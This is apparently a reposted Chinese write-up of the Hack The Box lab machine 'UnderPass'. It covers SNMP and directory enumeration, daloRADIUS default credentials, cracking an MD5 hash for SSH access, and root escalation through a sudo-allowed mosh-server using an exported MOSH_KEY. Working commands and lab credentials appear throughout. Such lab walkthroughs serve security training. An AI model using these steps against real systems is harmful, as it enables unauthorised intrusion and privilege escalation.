HTB-UnderPass

该靶机nmap扫描udp发现161端口snmp服务，使用snmpwalk扫描得到目次信息，使用dirsearch扫描得到一个yml文件，存放数据库账号密码，记录下来，此时需要登录口，使用字典扫描拼接/app目次，得到登录界面，使用版本号搜索默认凭证，找到一个用户，MD5解密hex值，ssh登录，sudo -l 发现mosh，查找使用方式，设置环境变量，然后实行登录

一台现役靶机

一、信息网络

靶机ip：10.10.11.48
攻击机ip：10.10.16.26
nmap扫描，发现服务是Apache/2.4.52 (Ubuntu)

先设置域名解析

1. echo "10.10.11.48 underpass.htb" |sudo tee -a /etc/hosts

复制代码

实行UDP扫描

1. nmap -sU -sV -Pn 10.10.11.48

复制代码

得到的信息如下，开着snmp服务

1. PORT     STATE         SERVICE
2. 161/udp  open          snmp
3. 1812/udp open|filtered radius
4. 1813/udp open|filtered radacct

复制代码

目次扫描

没有泄露目次

子域名扫描

使用ffuf扫描均未发现可用信息

1. ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt:FUZZ -u "http://underpass.htb/FUZZ" -ic
2. ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FFUZ -H "Host: FFUZ.underpass.htb" -u http://underpass.htb -fw 20

复制代码

没有可用信息

二、边界突破

访问80端口，是一个apache2的配置信息，ubuntu系统

这里查看源码以及指纹信息均未发现泄露的信息，只能重新扫描靶机了
使用snmpwalk实行扫描，关键信息：daloradius

猜测其是目次，拼接进行扫描

目次如下

1. /daloradius/.gitignore   
2. /daloradius/app
3. /daloradius/ChangeLog                             
4. /daloradius/doc  ->  http://10.10.11.48/daloradius/doc/
5. /daloradius/Dockerfile                           
6. /daloradius/docker-compose.yml                    
7. /daloradius/library  ->  http://10.10.11.48/daloradius/library/
8. /daloradius/LICENSE                              
9. /daloradius/README.md                             
10. /daloradius/setup  ->  http://10.10.11.48/daloradius/setup/

复制代码

访问第一个目次，发现一个配置文件，但是无法访问

在docker-compose.yml   文件里发现数据库的账户密码

如下，这个时间应该找找有没有登录点，这几个目次均没有，重新扫描/app目次

1. database:radius
2. user：radius
3. passswd:radiusdbpw

复制代码

扫出来一个登录界面

1. daloradius/app/users/login.php

复制代码

一个登录界面，使用上面的账户密码不成功

换一个字典重新扫描，得到一个新目次

1. dirsearch -u http://10.10.11.48/daloradius/app/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e*
2. http://10.10.11.48/daloradius/app/operators/login.php

复制代码

一个登录界面，先实行上面的账户密码不成功，发现下面有版本号

发现默认用户名administrator和密码radius，

成功登录

在config里有个语言可以修改，先换成中文

发现一个用户名和密码

如下

1. 用户名：svcMosh
2. 密码：412DD4759978ACFCC81DEAB01B382403

复制代码

在该网站识别，拿到密码：underwaterfriends

ssh连接

三、权限提升

user.txt

该目次下存放user.txt，成功查看

root.txt

sudo -l查看，发现一处可实行路径

1. /usr/bin/mosh-server

复制代码

实行一下看看，看不懂

查看suid

查找上面发现的可实行路径，参考文章

1. https://www.cnblogs.com/sunweiye/p/12003616.html

复制代码

方法如下

重新查看

找到上面的密钥：NnSZo0rz1vdi7bRzX4Hn4g

1. export MOSH_KEY=NnSZo0rz1vdi7bRzX4Hn4g
2. mosh-client 127.0.0.1 60001 #这里应该连接的是靶机ip，因为是在靶机里执行，直接连接其本地ip

复制代码

成功登录，拿到root.txt

结束

四、总结

snmpwalk扫描：
dirsearch字典扫描：
mosh登录：

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。